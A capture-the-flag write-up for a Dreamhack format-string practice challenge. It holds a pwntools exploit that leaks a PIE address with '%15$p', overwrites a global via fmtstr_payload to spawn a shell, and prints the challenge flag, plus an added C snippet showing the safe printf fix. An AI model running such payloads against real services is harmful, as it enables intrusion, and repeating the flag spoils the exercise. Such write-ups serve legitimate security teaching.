Description
This is the practice problem from Exploit Tech: Format String Bug.
23.11 update
- binary updated
- Dockerfile is added to the attachment
checksec
```
iotfragile@iotfragile:~/CTF/Format_String_Bug$ checksec --file ./fsb_overwrite
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   ./fsb_overwrite
```
Solution
- Increase the index in %1$p, %2$p, ... one step at a time until the leaked value starts with 0x55..., i.e. an address that is assumed to lie inside the PIE-loaded binary.
- Work out which location in the binary that address points to, derive the base from it, then use the fmtstr_payload function to overwrite changeme with 1337.
fsb_overwrite
```c
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char format[40]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+28h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  setbuf(_bss_start, 0LL);
  while ( 1 )
  {
    do
    {
      get_string(format, 32LL);
      printf(format);
      puts(&byte_2009);
    }
    while ( changeme != 1337 );
    system("/bin/sh");
  }
}
```
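As an added example (not part of the original writeup or the challenge source), the vulnerable call from main above next to its hardened form, plus a small checker that counts conversion specifications in untrusted input; `echo_safe` and `count_format_conversions` are names chosen here.

```c
#include <stdio.h>

/* The bug in main(): user input is used directly as the format string.
 *     printf(format);      // "%15$p" reads stack slots, "%n" writes memory
 * The fix is to pass user data as an argument to a constant format. */
int echo_safe(const char *user)
{
    /* Returns the number of bytes written, exactly as printf does. */
    return printf("%s\n", user);
}

/* Count conversion specifications in an untrusted string.
 * "%%" is a literal percent sign and is not counted.
 * A result of 0 means the string is inert even if it reaches a
 * printf(format) call, which makes this a handy check when reviewing
 * logged user input for format-string probing. */
int count_format_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent, skip both characters */
            p++;
            continue;
        }
        n++;                    /* any other '%' starts a conversion */
    }
    return n;
}

int main(void)
{
    /* Constructed sample inputs: a harmless string, an escaped percent,
     * the leak probe used in the writeup, and a %n-style write. */
    const char *samples[] = { "hello", "100%% done", "%15$p", "%6$n" };
    for (int i = 0; i < 4; i++) {
        printf("%-12s conversions=%d\n", samples[i],
               count_format_conversions(samples[i]));
        echo_safe(samples[i]);  /* prints the sample literally */
    }
    return 0;
}
```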
solve.py
```python
from pwn import *
import warnings

#context.log_level = 'debug'
context.bits = 64
warnings.filterwarnings('ignore')

#p = process('fsb_overwrite')
p = remote('host3.dreamhack.games', 8746)

# Leak the 15th stack slot, which holds a code address inside the PIE binary.
p.sendline(b"%15$p")
main_address = p.recvline()
main_address = main_address.decode('utf-8')
main_address = int(main_address, 16)
print(hex(main_address))

# Argument index 6 is where the input buffer lands on the stack;
# overwrite changeme (at a fixed offset from the leak) with 1337.
payload = fmtstr_payload(6, {main_address+0x2d89:1337})
p.sendline(payload)
p.interactive()
```
Result
```
iotfragile@iotfragile:~/CTF/Format_String_Bug$ python3 solve.py
[+] Opening connection to host3.dreamhack.games on port 8746: Done
0x55d38e4cc293
[*] Switching to interactive mode
`aaaa\x1c\x
$ ls
flag
fsb_overwrite
$ cat flag
DH{b283dec57b17112a4e9aa6d5499c0f28}
$
```
FLAG
DH{b283dec57b17112a4e9aa6d5499c0f28}